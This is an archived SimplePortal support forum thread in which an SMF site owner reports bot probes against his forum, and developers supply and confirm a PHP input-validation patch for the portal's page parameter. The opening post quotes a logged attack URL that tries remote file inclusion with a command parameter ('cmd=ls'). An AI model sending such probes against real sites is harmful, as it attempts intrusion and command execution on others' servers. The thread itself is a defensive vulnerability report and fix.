collapse collapse

* Archive Notice

This is an Archive Forum.

The content in this forum may be out-of-date or have been superseded by newer information, and links in forum pages to other sites may not work. This forum contains archives for future reference.

Visit our thread at Simple Machines Forum for current support.

* User Info

 
 
Welcome, Guest. Please login or register.

* Who's Online

  • Dot Guests: 195
  • Dot Hidden: 0
  • Dot Users: 0

There aren't any users online.

* Shoutbox

Refresh History
  • Shoutbox is not for support!
  • {OCS}MasterSeal: Yup, Still adore SP
    April 21, 2019, 07:08:06 PM
  • {OCS}MasterSeal: STILL love SP :)
    November 24, 2018, 05:05:50 AM
  • ♦ Ninja ZX-10RR ♦: <3 aegersz
    September 13, 2018, 03:36:09 PM
  • aegersz: I STILL <3 LOVE SimplePortal
    September 13, 2018, 07:11:39 AM
  • aegersz: o LOVE you guys - Simple Portal rocks !
    May 09, 2018, 05:18:59 AM
  • Chen Zhen: our apologies for the site being down.. please read server issues topic
    March 22, 2018, 05:32:38 AM
  • {OCS}MasterSeal: LOL PLEASE forget I just posted that. I found the answer in my own dang post back in 2015. lol sorry!
    July 04, 2017, 10:47:55 PM
  • {OCS}MasterSeal: I know this SB isnt' for support, but I just have a general question. Who would I contact to find out where SP stores its block info? Is it DB driven or files? I searched the site but came up with nothing. probably my fault any insight is appreciated.
    July 04, 2017, 10:43:36 PM
  • ♦ Ninja ZX-10RR ♦: Excuse me but what does Simpleportal have to deal with that?
    February 05, 2017, 08:21:14 PM
  • WhiteEagle: of course IMHO that site appears to be dead :(
    February 04, 2017, 01:08:05 PM
  • WhiteEagle: If I can get that, then I'll use it for that site...
    February 04, 2017, 01:07:35 PM
  • WhiteEagle: decided to not use SMF for any projects, unless I can get a copy of the premium version of the fanfiction archive plugin
    February 04, 2017, 01:06:54 PM
  • expertdecisions: cloudflare
    January 28, 2017, 08:01:47 AM
  • aegersz: SM release 2.0.13 !
    January 12, 2017, 06:00:13 AM
  • raffo: Tks Emanuele, even if I didn't understand the fix :D
    November 07, 2016, 02:01:20 AM
  • emanuele: [link]
    November 01, 2016, 12:43:50 PM
  • emanuele: raffo: the English support board is a good place. ;)
    November 01, 2016, 12:43:38 PM
  • raffo: Where can I find the fix for the shoutbox?
    November 01, 2016, 05:06:09 AM
  • {OCS}MasterSeal: To the SP team, I make a point to come here and thank you as much as possible for your work.  so again, THANK YOU!
    October 28, 2016, 10:38:05 AM
  • emanuele: That's indeed funny, the limit is present only in the patch and not the full install.
    October 22, 2016, 06:14:58 PM

* Recent Posts

Adding Forums Button to Nav bar by jirapon
[August 01, 2019, 09:07:12 AM]


Re: Board Icons by ♦ Ninja ZX-10RR ♦
[July 30, 2019, 04:03:41 PM]


MOVED: Czech translation???? by ♦ Ninja ZX-10RR ♦
[July 30, 2019, 03:04:51 PM]


Board Icons by jirapon
[July 30, 2019, 07:28:44 AM]


Re: Thankyou Simpleportal, by ♦ Ninja ZX-10RR ♦
[July 29, 2019, 09:41:29 AM]

Welcome to SimplePortal.net! You can download SimplePortal from the Downloads Area!

Author Topic: Possible SP hack on SMF  (Read 7233 times)

0 Members and 1 Guest are viewing this topic.

Offline busterone

  • Semi Newbie
  • *
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Possible SP hack on SMF
« on: August 11, 2014, 08:56:36 PM »
As per this topic at simplemachines.org  http://www.simplemachines.org/community/index.php?topic=526259.msg3730305#msg3730305
Arantor suggested I post this here for the developers to take a look at. There is no apparent weakness, but the response to the url request was odd. I received a "sorry, SMF could not connect to the database" error upon attempting manually access this url.
Here is the url and error from the error log
Code: [Select]
http://www.thedemonsden.com/index.php?page[path]=http://www.google.com/humans.txt?&amp;cmd=ls
Undefined offset: 0
File: /homepages/xxxxxxxxxxxxxxx/htdocs/forum/Sources/Subs-Db-mysql.php
Line: 103

I am using SMF 2.0.8, and simpleportal 2.3.5

I will include the installed mods list as well
Code: [Select]
1. SMF 2.0.8 Update 1.0 [ Uninstall ]
2. SMF 2.0.7 Update 1.0 [ Uninstall ]
3. Add IP2Location to Track IP 1.31 [ Uninstall ]
4. SMF 1.1.19 / 2.0.6 Update 1.0 [ Uninstall ]
5. Treasury 2.12 [ Uninstall ]
6. SMF 2.0.5 Update 1.0 [ Uninstall ]
7. Misc Anti Spam 1.0 [ Uninstall ]
8. Stupid bouncy BBC 1.0 [ Uninstall ]
9. SMF 2.0.4 Update 1.0 [ Uninstall ]
10. SMF 2.0.3 Update 1.0 [ Uninstall ]
11. Annoy User 1.2.2 [ Uninstall ]
12. SimplePortal 2.3.5 [ Uninstall ]
13. SMF 2.0.2 Update 1.0 [ Uninstall ]
14. SMF 2.0.1 Update 1.0 [ Uninstall ]
15. SMF4Mobile Mod 1.0 [ Uninstall ]
16. Sitemap 2.2.0 [ Uninstall ]
17. LMGTFY BBcode v2.2 2.2 [ Uninstall ]
18. Bookmarks 2.3 [ Uninstall ]
19. Spoiler Tag 0.7.2 [ Uninstall ]
20. PM Attachments 1.6 [ Uninstall ]
21. Custom Action Mod 3.2 [ Uninstall ]
22. httpBL 2.5.1 [ Uninstall ]
23. Stop Spammer 2.3.9 [ Uninstall ]
24. SMF Chess 2.1.4 [ Uninstall ]
25. SMF Staff Page 1.7 [ Uninstall ]
26. PM to New Members 1.2 [ Uninstall ]
27. Aeva ~ Auto-Embed Video & Audio 7.0 [ Uninstall ]
28. The Rules 1.2 [ Uninstall ]
29. Add Domaintools to TrackIP 1.1 [ Uninstall ]
30. Arcadeworld Template 2.4 [ Uninstall ]
31. E-Arcade Beta4-SMF2rc2


As stated in the original topic, there is no harm done and no access to the site period, it is simply the site response that is odd.

Offline Chen Zhen

  • The Underdog
  • Operations Manager
  • *
  • Posts: 1351
  • Gender: Male
  • Kinesis
    • WebDev
  • SMF Version: 2.1
  • EhPortal Version: 1.22
Re: Possible SP hack on SMF
« Reply #1 on: August 11, 2014, 10:49:41 PM »
  Here is a patch for the specific issue you describe:

file: ../Sources/Subs-Portal.php

find:
Code: [Select]
if (!empty($_GET['page']) && (empty($context['current_action']) || $context['current_action'] == 'portal'))
$page_info = sportal_get_pages($_GET['page'], true, true);

replace with:
Code: [Select]
if (!empty($_GET['page']) && (empty($context['current_action']) || $context['current_action'] == 'portal'))
{
$page_info = (!empty($_GET['page'])) && !is_array($_GET['page']) ? $smcFunc['htmltrim']($_GET['page']) : 0;
if (preg_match('~[^A-Za-z0-9_]+~', $page_info) != 0 || preg_match('~[0-9]+~', $page_info) != 0)
fatal_lang_error('error_sp_page_not_found', false);

$page_info = sportal_get_pages($page_info, true, true);
}



  All I did here was more or less apply the filter Sinan put in the SP admin template to the page request entered in the url.


Regards.
« Last Edit: August 12, 2014, 01:01:04 AM by Underdog »

Offline busterone

  • Semi Newbie
  • *
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #2 on: August 12, 2014, 10:39:08 AM »
Thanks Underdog.  I cleared the error log and waited 2 days and these bots came back for 5 shots at it again, then stopped. Obviously it wasn't getting them the results they wanted, and there was no security issue that I can see either. It seems that they must just be probing for a weakness through the page request.  Better safe than sorry though. :)

Offline [SiNaN]

  • Mr. SimplePortal
  • Developer
  • *
  • Posts: 6782
  • SMF Version: 2.0.15
  • SP Version: 2.3.7
Re: Possible SP hack on SMF
« Reply #3 on: August 12, 2014, 11:04:21 AM »
It turns out that the code we have does not account for certain cases. This will be fixed in our upcoming patch level release. Thank you for your report!
And slowly, you come to realize... It's all as it should be...

Offline busterone

  • Semi Newbie
  • *
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #4 on: August 12, 2014, 04:58:46 PM »
No problem at all. If the bots had not hammered away like they did, I probably would not have noticed it at all if it had only been a few errors in the log.   :)

Offline Chen Zhen

  • The Underdog
  • Operations Manager
  • *
  • Posts: 1351
  • Gender: Male
  • Kinesis
    • WebDev
  • SMF Version: 2.1
  • EhPortal Version: 1.22
Re: Possible SP hack on SMF
« Reply #5 on: August 12, 2014, 06:23:10 PM »

busterone,

  Does the patch work as expected? (0 errors in log and incorrect page is directed to page not exist display)

Offline busterone

  • Semi Newbie
  • *
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #6 on: August 12, 2014, 08:45:33 PM »
Works perfect. No errors in error log and the forum does direct to "The page you requested cannot be found."  error page.

Offline [SiNaN]

  • Mr. SimplePortal
  • Developer
  • *
  • Posts: 6782
  • SMF Version: 2.0.15
  • SP Version: 2.3.7
Re: Possible SP hack on SMF
« Reply #7 on: August 16, 2014, 05:44:08 AM »
Fixed for the upcoming version.
And slowly, you come to realize... It's all as it should be...